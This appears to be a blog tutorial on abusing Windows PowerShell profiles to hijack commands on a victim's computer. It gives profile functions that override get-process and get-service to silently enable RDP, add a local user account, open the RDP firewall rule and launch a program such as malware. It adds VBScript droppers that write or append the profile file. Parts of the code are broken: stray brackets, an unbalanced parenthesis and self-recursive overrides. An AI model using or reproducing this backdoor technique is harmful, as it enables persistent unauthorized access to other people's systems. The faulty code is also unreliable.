Introduction Funny 
Perhaps
you have seen it in action movies when a hackers’ victim types a
specific command line, his computer explodes. We can’t blow someone ‘s
computer remotely, but we can change what a command does after it is
typed by a user. This is done by using the Windows powershell profiles .
What is the windows powershell profile ?
When you add aliases, functions, and variables, you are actually adding them only to the current Windows PowerShell session. If you exit the session or close Windows PowerShell, the changes are lost. To retain these changes, you can create a Windows PowerShell profile and add the aliases, functions, and variables to the profiles. The profile is loaded every time that Windows PowerShell . You can have four different profiles in Windows PowerShell. The profiles are listed in load order. The most specific profiles have precedence over less specific profiles where they apply. • %windir%\system32\WindowsPowerShell\v1.0\profile.ps1 This profile applies to all users and all shells. • %windir%\system32\WindowsPowerShell\v1.0\ Microsoft.PowerShell_profile.ps1 This profile applies to all users, but only to the Microsoft.PowerShell shell. • %UserProfile%\My Documents\WindowsPowerShell\profile.ps1 This profile applies only to the current user, but affects all shells. • %UserProfile%\My Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 This profile applies only to the current user and the Microsoft.PowerShell shell. Windows PowerShell profiles are not created automatically. To create a profile, create a text file with the specified name in the specified location. Typically, you will use the user-specific, shell-specific profile, known as the Windows PowerShell user profile. The location of this profile is stored in the $profile variable. To display the path to the Windows PowerShell profile, type: • $profile To determine whether a Windows PowerShell profile has been created on the system, type: • test-path $profile If the profile exists, the response is True; otherwise, it is False. To create a Windows PowerShell profile file, type: • new-item -path $profile -itemtype file –force To open the profile in Notepad, type: • notepad $profile To create one of the other profiles, such as the profile that applies to all users and all shells, type: • new-item -path $env:windir\System32\WindowsPowerShell\v1.0\profile.ps1 -itemtype file -force The profile is effective only when the file is located exactly in the path and with the file name that is stored in the $profile variable. Therefore, if you create a profile in Notepad and then save it, or if you copy a profile to your system, be sure to save the file in the path and with the file name specified in the $profile variable. If you create a profile in Notepad, enclose the file name in quotation marks to preserve the PS1 file name extension. For example: • “Microsoft.PowerShell_profile.ps1“ Without the quotation marks, Notepad appends the .txt file name extension to the file, and Windows PowerShell will not recognize it. Change command line jobs Now we want After the user executes the get-process command Instead of running the command The following work done : 1 – enable remote desktop protocol2 – Create a new user account
3 – Allow incoming RDP on firewall
4 – Enable secure RDP authentication
5- Run calc.exe program
6 – clear screen
7 – show all task process list In the first step you mast open $profile in notepad ( notepad $profile ) and type this command on them . you can select different profile of windows powershell for this job . in this example I select Microsoft.PowerShell_profile.ps1 from C:\Users\Micr0s0ft\Documents\WindowsPowerShell location .
The overall structure of the command is as follows
————————–
function command-name{ (command1) (command2) . . . (command n) }So below we write
function get-process { (set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0) (net user moslem iran /add) (Enable-NetFirewallRule -DisplayGroup "Remote Desktop") (set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1 ) (Invoke-Item C:\Windows\System32\calc.exe) (clear) (get-process) }
If victim for instance type get-service, command .first Calc.exe or malware.exe will be executed before the list of services are displayed
function get-service { (Invoke-Item C:\Windows\System32\calc.exe) (clear) (get-service) }If victim for instance type get-service, command .first Calc.exe or malware.exe will be executed before the list of services are displayed
Now , if get-process and get-service commands are typed by victim, the above code will start running. Now , assuming that you’re back on the system with a little time or have remote access to computer and you are notable to follow the above steps, these steps can be done by executing a VBS file. In first step I create one text file with Microsoft.PowerShell_profile.txt name in the C:\Users\Micr0s0ft\Documents\WindowsPowerShell location and appned file and add all need command line And finally change type of file to ps1 ( powershell script file )function get-service { (Invoke-Item C:\Windows\System32\calc.exe)(clear)(get-service) }
'create a text file dim filesys, demofolder, filetxt Set filesys = CreateObject("Scripting.FileSystemObject") Set demofolder = filesys.GetFolder("C:\Users\Micr0s0ft\Documents\WindowsPowerShell") Set filetxt = demofolder.CreateTextFile("Microsoft.PowerShell_profile.txt", True) filetxt.WriteLine("function CommandName {") ' start function and select command ' commandline to execute filetxt.WriteLine("command 1") ' for example : filetxt.WriteLine("(net user moslem iran /add") to create a user account filetxt.WriteLine("command 2") . . filetxt.WriteLine("command n") filetxt.WriteLine("( { )") 'end of function filetxt.Close ' close text file and save them 'chane file type from txtto PS1 using FSO in VBScript Dim Fso Set Fso = WScript.CreateObject("Scripting.FileSystemObject") <Fso.MoveFile " Microsoft.PowerShell_profile.txt", " Microsoft.PowerShell_profile.ps1"
Now you can save this file and run it on your victim’s computer . it’s better to append Windows powershell profile file and add scripts to them. To append text file you can using this code:
strFile = "C:\Users\Micr0s0ft\Documents\WindowsPowerShell\ Microsoft.PowerShell_profile.txt"
Const ForAppending = 8
set objFSO = CreateObject("Scripting.FileSystemObject")
set objFile = objFSO.OpenTextFile(strFile, ForAppending, True)
objFile.WriteLine("function get-service {")
objFile.WriteLine("(Invoke-Item C:\Windows\System32\calc.exe)")
objFile.WriteLine("(get-service)")
objFile.WriteLine("}")
objFile.Close
Dim Fso>
Set Fso = WScript.CreateObject("Scripting.FileSystemObject")
Fso.MoveFile " Microsoft.PowerShell_profile.txt", " Microsoft.PowerShell_profile.ps1"
